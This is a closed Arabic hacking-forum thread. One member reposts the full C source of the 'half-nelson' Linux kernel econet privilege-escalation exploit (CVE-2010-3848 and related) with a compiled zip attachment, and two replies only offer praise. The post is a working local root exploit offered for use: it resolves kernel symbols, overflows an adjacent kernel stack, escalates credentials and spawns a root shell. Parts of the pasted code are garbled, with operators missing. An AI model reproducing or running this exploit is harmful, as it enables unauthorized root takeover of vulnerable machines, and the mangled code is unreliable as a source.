حالة الموضوع:
مغلق
 1. ghost-dz

  ghost-dz DeveloPer Plus

  الأنتساب:
  ‏29 مايو 2012
  المشاركات:
  21
  الإعجابات المتلقاة:
  4
  نقاط الجائزة:
  3
  الإقامة:
  algeria
  كود PHP:
  /*
   * half-nelson.c
   *
   * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
   * Jon Oberheide <[email protected]>
   * http://jon.oberheide.org
   *
   * Information:
   *
   *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
   *
   *   Stack-based buffer overflow in the econet_sendmsg function in
   *   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
   *   econet address is configured, allows local users to gain privileges by
   *   providing a large number of iovec structures.
   *
   *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
   *
   *   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
   *   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
   *   allows local users to bypass intended access restrictions and configure
   *   econet addresses via an SIOCSIFADDR ioctl call.
   *
   *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
   *
   *   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
   *   initialize certain structures, which allows local users to obtain
   *   potentially sensitive information from kernel stack memory.
   *
   * Usage:
   *
   *   $ gcc half-nelson.c -o half-nelson -lrt
   *   $ ./half-nelson
   *   [+] looking for symbols...
   *   [+] resolved symbol commit_creds to 0xffffffff81088ad0
   *   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
   *   [+] resolved symbol ia32_sysret to 0xffffffff81046692
   *   [+] spawning children to achieve adjacent kstacks...
   *   [+] found parent kstack at 0xffff88001c6ca000
   *   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
   *   [+] lower child spawning a helper...
   *   [+] lower child calling compat_sys_wait4 on helper...
   *   [+] helper going to sleep...
   *   [+] upper child triggering stack overflow...
   *   [+] helper woke up
   *   [+] lower child returned from compat_sys_wait4
   *   [+] parent's restart_block has been clobbered
   *   [+] escalating privileges...
   *   [+] launching root shell!
   *   # id
   *   uid=0(root) gid=0(root)
   *
   * Notes:
   *
   *   This exploit leverages three vulnerabilities to escalate privileges.
   *   The primary vulnerability is a kernel stack overflow, not a stack buffer
   *   overflow as the CVE description incorrectly states. I believe this is the
   *   first public exploit for a kernel stack overflow, and it turns out to be
   *   a bit tricky due to some particulars of the econet vulnerability. A full
   *   breakdown of the exploit is forthcoming.
   *
   *   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
   */
   
  #include <stdio.h>
  #include <stdlib.h>
  #include <stdint.h>
  #include <stddef.h>
  #include <string.h>
  #include <unistd.h>
  #include <errno.h>
  #include <fcntl.h>
  #include <limits.h>
  #include <syscall.h>
  #include <inttypes.h>
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <sys/wait.h>
  #include <sys/ioctl.h>
  #include <sys/mman.h>
  #include <sys/ipc.h>
  #include <sys/sem.h>
  #include <sys/stat.h>
  #include <sys/mman.h>
  #include <sys/resource.h>
  #include <sys/syscall.h>
  #include <netinet/in.h>
  #include <net/if.h>
   
  #define IOVS           446
  #define NPROC          1024
  #define KSTACK_SIZE    8192
   
  #define KSTACK_UNINIT  0
  #define KSTACK_UPPER   1
  #define KSTACK_LOWER   2
  #define KSTACK_DIE     3
  #define KSTACK_PARENT  4
  #define KSTACK_CLOBBER 5
   
  #define LEAK_BASE      0xffff880000000000
  #define LEAK_TOP       0xffff8800c0000000
  #define LEAK_DEPTH     500
  #define LEAK_OFFSET    32
   
  #define NR_IPC         0x75
  #define NR_WAIT4       0x72
  #define SEMCTL         0x3
   
  #ifndef PF_ECONET
  #define PF_ECONET      19
  #endif
   
  #define STACK_OFFSET   6
  #define RESTART_OFFSET 40
   
  struct ec_addr {
      
  unsigned char station;
      
  unsigned char net;
  };
   
  struct sockaddr_ec {
      
  unsigned short sec_family;
      
  unsigned char port;
      
  unsigned char cb;
      
  unsigned char type;
      
  struct ec_addr addr;
      
  unsigned long cookie;
  };
   
  struct ipc64_perm {
      
  uint32_t key;
      
  uint32_t uid;
      
  uint32_t gid;
      
  uint32_t cuid;
      
  uint32_t cgid;
      
  uint32_t mode;
      
  uint16_t seq;
      
  uint16_t __pad2;
      
  unsigned long __unused1;
      
  unsigned long __unused2;
  };
   
  struct semid64_ds {
      
  struct ipc64_perm sem_perm;
      
  unsigned long sem_otime;
      
  unsigned long __unused1;
      
  unsigned long sem_ctime;
      
  unsigned long __unused;
      
  unsigned long sem_nsems;
      
  unsigned long __unused3;
      
  unsigned long __unused4;
  };
   
  union semun {
      
  int val;
      
  struct semid_ds *buf;
      
  unsigned short *array;
      
  struct seminfo *__buf;
  };
   
  struct region {
      
  unsigned long parent;
      
  unsigned long addrs[NPROC];
  };
  struct region *region;
   
  typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
  typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
  _commit_creds commit_creds;
  _prepare_kernel_cred prepare_kernel_cred;
  unsigned long ia32_sysret;
    
  void __attribute__((regparm(3)))
  kernel_code(void)
  {
      
  commit_creds(prepare_kernel_cred(0));
  }
   
  void
  payload_parent
  (void)
  {
      
  asm volatile (
          
  "mov $kernel_code, %rax\n"
          "call *%rax\n"
      
  );
  }
   
  void
  payload_child
  (void)
  {
      
  asm volatile (
          
  "movq $payload_parent, (%0)\n"
          "jmpq *%1\n"
          
  :
          : 
  "r"(region->parent RESTART_OFFSET), "r"(ia32_sysret)
      );
  }
   
  unsigned long
  get_kstack
  (void)
  {
      
  int isizeoffset;
      
  union semun *arg;
      
  struct semid_ds dummy;
      
  struct semid64_ds *leaked;
      
  char *stack_start, *stack_end;
      
  unsigned char *p;
      
  unsigned long kstack, *ptr;
   
      
  /* make sure our argument is 32-bit accessible */
      
  arg mmap(NULL4096PROT_READ PROT_WRITEMAP_ANONYMOUS MAP_PRIVATE MAP_32BIT, -10);
      if (
  arg == MAP_FAILED) {
          
  printf("[-] failure mapping memory, aborting!\n");
          exit(
  1);
      }
   
      
  /* map a fake stack to use during syscall */
      
  stack_start mmap(NULL4096PROT_READ PROT_WRITEMAP_ANONYMOUS MAP_PRIVATE MAP_32BIT, -10);
      if (
  stack_start == MAP_FAILED) {
          
  printf("[-] failure mapping memory, aborting!\n");
          exit(
  1);
      }
      
  stack_end stack_start 4096;
   
      
  memset(arg0sizeof(union semun));
      
  memset(&dummy0sizeof(struct semid_ds));
      
  arg->buf = &dummy;
   
      
  /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
      
  asm volatile (
          
  "push %%rax\n"
          "push %%rbx\n"
          "push %%rcx\n"
          "push %%rdx\n"
          "push %%rsi\n"
          "push %%rdi\n"
          "movl %0, %%eax\n"
          "movl %1, %%ebx\n"
          "movl %2, %%ecx\n"
          "movl %3, %%edx\n"
          "movl %4, %%esi\n"
          "movq %5, %%rdi\n"
          "movq %%rsp, %%r8\n"
          "movq %6, %%rsp\n"
          "push %%r8\n"
          "int $0x80\n"
          "pop %%r8\n"
          "movq %%r8, %%rsp\n"
          "pop %%rdi\n"
          "pop %%rsi\n"
          "pop %%rdx\n"
          "pop %%rcx\n"
          "pop %%rbx\n"
          "pop %%rax\n"
          
  :
          : 
  "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
          : 
  "memory""rax""rbx""rcx""rdx""rsi""rdi""r8"
      
  );
   
      
  /* naively extract a pointer to the kstack from the kstack */
      
  stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
      
  kstack = *(unsigned long *) p;
   
      if (
  kstack LEAK_BASE || kstack LEAK_TOP) {
          
  printf("[-] failed to leak a suitable kstack address, try again!\n");
          exit(
  1);
      }
      if ((
  kstack 0x1000) < (0x1000 LEAK_DEPTH)) {
          
  printf("[-] failed to leak a suitable kstack address, try again!\n");
          exit(
  1);
      }
   
      
  kstack kstack & ~0x1fff;
       
      return 
  kstack;
  }
   
  unsigned long
  get_symbol
  (char *name)
  {
      
  FILE *f;
      
  unsigned long addr;
      
  char dummysym[512];
      
  int ret 0;
    
      
  fopen("/proc/kallsyms""r");
      if (!
  f) {
          return 
  0;
      }
    
      while (
  ret != EOF) {
          
  ret fscanf(f"%p %c %s\n", (void **) &addr, &dummysym);
          if (
  ret == 0) {
              
  fscanf(f"%s\n"sym);
              continue;
          }
          if (!
  strcmp(namesym)) {
              
  printf("[+] resolved symbol %s to %p\n"name, (void *) addr);
              
  fclose(f);
              return 
  addr;
          }
      }
      
  fclose(f);
    
      return 
  0;
  }
   
  int
  get_adjacent_kstacks
  (void)
  {
      
  int iretshmpidtype;
   
      
  /* create shared communication channel between parent and its children */
      
  shm shm_open("/halfnelson"O_RDWR O_CREATS_IRWXU S_IRWXG S_IRWXO);
      if (
  shm 0) {
          
  printf("[-] failed creating shared memory, aborting!\n");
          exit(
  1);
      }
   
      
  ret ftruncate(shmsizeof(struct region));
      if (
  ret != 0) {
          
  printf("[-] failed resizing shared memory, aborting!\n");
          exit(
  1);
      }
   
      
  region mmap(NULLsizeof(struct region), PROT_READ PROT_WRITEMAP_SHAREDshm0);
      
  memset(regionKSTACK_UNINITsizeof(struct region));
   
      
  /* parent kstack self-discovery */
      
  region->parent get_kstack();
   
      
  printf("[+] found parent kstack at 0x%lx\n"region->parent);
   
      
  /* fork and discover children with adjacently-allocated kernel stacks */
      
  for (0NPROC; ++i) {
          
  pid fork();
   
          if (
  pid 0) {
              
  type KSTACK_PARENT;
              continue;
          } else if (
  pid == 0) {
              
  /* children do kstack self-discovery */
              
  region->addrs[i] = get_kstack();
   
              
  /* children sleep until parent has found adjacent children */
              
  while (1) {
                  
  sleep(1);
                  if (
  region->addrs[i] == KSTACK_DIE) {
                      
  /* parent doesn't need us :-( */
                      
  exit(0);
                  } else if (
  region->addrs[i] == KSTACK_UPPER) {
                      
  /* we're the upper adjacent process */
                      
  type KSTACK_UPPER;
                      break;
                  } else if (
  region->addrs[i] == KSTACK_LOWER) {
                      
  /* we're the lower adjacent process */
                      
  type KSTACK_LOWER;
                      break;
                  }
              }
              break;
          } else {
              
  printf("[-] fork failed, aborting!\n");
              exit(
  1);
          }
      }
   
      return 
  type;
  }
   
  void
  do_parent
  (void)
  {
      
  int ijupperlower;
   
      
  /* parent sleeps until we've discovered all the child kstacks */
      
  while (1) {
          
  sleep(1);
          for (
  0NPROC; ++i) {
              if (
  region->addrs[i] == KSTACK_UNINIT) {
                  break;
              }
          }
          if (
  == NPROC) {
              break;
          }
      }
   
      
  /* figure out if we have any adjacent child kstacks */
      
  for (0NPROC; ++i) {
          for (
  0NPROC; ++j) {
              if (
  region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
                  break;
              }
          }
          if (
  != NPROC) {
              break;
          }
      }
      if (
  == NPROC && == NPROC) {
          
  printf("[-] failed to find adjacent kstacks, try again!\n");
          exit(
  1);
      }
   
      
  upper i;
      
  lower j;
   
      
  printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n"region->addrs[lower], region->addrs[upper]);
   
      
  /* signal to non-adjacent children to die */
      
  for (0NPROC; ++i) {
          if (
  != upper && != lower) {
              
  region->addrs[i] = KSTACK_DIE;
          }
      }
   
      
  /* signal adjacent children to continue on */
      
  region->addrs[upper] = KSTACK_UPPER;
      
  region->addrs[lower] = KSTACK_LOWER;
   
      
  /* parent sleeps until child has clobbered the fptr */
      
  while (1) {
          
  sleep(1);
          if (
  region->parent == KSTACK_CLOBBER) {
              break;
          }
      }
   
      
  printf("[+] escalating privileges...\n");
   
      
  /* trigger our clobbered fptr */
      
  syscall(__NR_restart_syscall);
   
      
  /* our privileges should be escalated now */
      
  if (getuid() != 0) {
          
  printf("[-] privilege escalation failed, aborting!\n");
          exit(
  1);
      }
   
      
  printf("[+] launching root shell!\n");
   
      
  execl("/bin/sh""/bin/sh"NULL);
  }
   
  void
  do_child_upper
  (void)
  {
      
  int ireteco_sock;
      
  struct sockaddr_ec eco_addr;
      
  struct msghdr eco_msg;
      
  struct iovec iovs[IOVS];
      
  struct ifreq ifr;
      
  char *target;
   
      
  /* calculate payload target, skip prologue */
      
  target = (char *) payload_child;
      
  target += 4;
       
      
  /* give lower child a chance to enter its wait4 call */
      
  sleep(1);
   
      
  /* write some zeros */
      
  for (0STACK_OFFSET; ++i) {
          
  iovs[i].iov_base = (void *) 0x0;
          
  iovs[i].iov_len 0;
      }
   
      
  /* overwrite saved ia32_sysret address on stack */
      
  iovs[STACK_OFFSET].iov_base = (void *) target;
      
  iovs[STACK_OFFSET].iov_len 0x0246;
   
      
  /* force abort via EFAULT */
      
  for (STACK_OFFSET 1IOVS; ++i) {
          
  iovs[i].iov_base = (void *) 0xffffffff00000000;
          
  iovs[i].iov_len 0;
      }
   
      
  /* create econet socket */
      
  eco_sock socket(PF_ECONETSOCK_DGRAM0);
      if (
  eco_sock 0) {
          
  printf("[-] failed creating econet socket, aborting!\n");
          exit(
  1);
      }
   
      
  memset(&ifr0sizeof(ifr));
      
  strcpy(ifr.ifr_name"lo");
   
      
  /* trick econet into associated with the loopback */
      
  ret ioctl(eco_sockSIOCSIFADDR, &ifr);
      if (
  ret != 0) {
          
  printf("[-] failed setting interface address, aborting!\n");
          exit(
  1);
      }
   
      
  memset(&eco_addr0sizeof(eco_addr));
      
  memset(&eco_msg0sizeof(eco_msg));
      
  eco_msg.msg_name = &eco_addr;
      
  eco_msg.msg_namelen sizeof(eco_addr);
      
  eco_msg.msg_flags 0;
      
  eco_msg.msg_iov = &iovs[0];
      
  eco_msg.msg_iovlen IOVS;
   
      
  printf("[+] upper child triggering stack overflow...\n");
   
      
  /* trigger the kstack overflow into lower child's kstack */
      
  ret sendmsg(eco_sock, &eco_msg0);
      if (
  ret != -|| errno != EFAULT) {
          
  printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
          exit(
  1);
      }
   
      
  close(eco_sock);
  }
   
  void
  do_child_lower
  (void)
  {
      
  int pid;
   
      
  printf("[+] lower child spawning a helper...\n");
   
      
  /* fork off a helper to wait4 on */
      
  pid fork();
      if (
  pid == 0) {
          
  printf("[+] helper going to sleep...\n");
          
  sleep(5);
          
  printf("[+] helper woke up\n");
          exit(
  1);
      }
   
      
  printf("[+] lower child calling compat_sys_wait4 on helper...\n");
   
      
  /* syscall(NR_WAIT4, pid, 0, 0, 0) */
      
  asm volatile (
          
  "push %%rax\n"
          "push %%rbx\n"
          "push %%rcx\n"
          "push %%rdx\n"
          "push %%rsi\n"
          "movl %0, %%eax\n"
          "movl %1, %%ebx\n"
          "movl %2, %%ecx\n"
          "movl %3, %%edx\n"
          "movl %4, %%esi\n"
          "int $0x80\n"
          "pop %%rsi\n"
          "pop %%rdx\n"
          "pop %%rcx\n"
          "pop %%rbx\n"
          "pop %%rax\n"
          
  :
          : 
  "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
          : 
  "memory""rax""rbx""rcx""rdx""rsi"
      
  );
   
      
  printf("[+] lower child returned from compat_sys_wait4\n");
   
      
  printf("[+] parent's restart_block has been clobbered\n");
   
      
  /* signal parent that our fptr should now be clobbered */
      
  region->parent KSTACK_CLOBBER;
  }
   
  int
  main
  (int argcchar **argv)
  {
      
  int type;
   
      if (
  sizeof(unsigned long) != 8) {
          
  printf("[-] x86_64 only, sorry!\n");
          exit(
  1);
      }
   
      
  printf("[+] looking for symbols...\n");
    
      
  commit_creds = (_commit_credsget_symbol("commit_creds");
      if (!
  commit_creds) {
          
  printf("[-] symbol table not available, aborting!\n");
          exit(
  1);
      }
    
      
  prepare_kernel_cred = (_prepare_kernel_credget_symbol("prepare_kernel_cred");
      if (!
  prepare_kernel_cred) {
          
  printf("[-] symbol table not available, aborting!\n");
          exit(
  1);
      }
   
      
  ia32_sysret get_symbol("ia32_sysret");
      if (!
  ia32_sysret) {
          
  printf("[-] symbol table not available, aborting!\n");
          exit(
  1);
      }
   
      
  printf("[+] spawning children to achieve adjacent kstacks...\n");
   
      
  type get_adjacent_kstacks();
   
      if (
  type == KSTACK_PARENT) {
          
  do_parent();
      } else if (
  type == KSTACK_UPPER) {
          
  do_child_upper();
      } else if (
  type == KSTACK_LOWER) {
          
  do_child_lower();
      }
   
      return 
  0;
  }
  http://www.exploit-db.com/exploits/17787

  compiled by ghost-dz
  Tested on (2.6.35-22-generic-pae #33-Ubuntu)
   

  الملفات المرفقة:

  • 2636-2.zip
   حجم الملف:
   6.2 ك. ب
   المشاهدات:
   10
 2. Dr.aL-jArH

  Dr.aL-jArH DeveloPer Plus

  الأنتساب:
  ‏24 أغسطس 2012
  المشاركات:
  140
  الإعجابات المتلقاة:
  1
  نقاط الجائزة:
  18
  رد: Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit

  واصل بدون فواصل
   
 3. السيف القاتل

  السيف القاتل Developer

  الأنتساب:
  ‏13 ديسمبر 2012
  المشاركات:
  54
  الإعجابات المتلقاة:
  0
  نقاط الجائزة:
  6
  الإقامة:
  العراق البصره
  رد: Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit

  تسسسسسسسلم يابطل
  ماقصرت
   
حالة الموضوع:
مغلق

مشاركة هذه الصفحة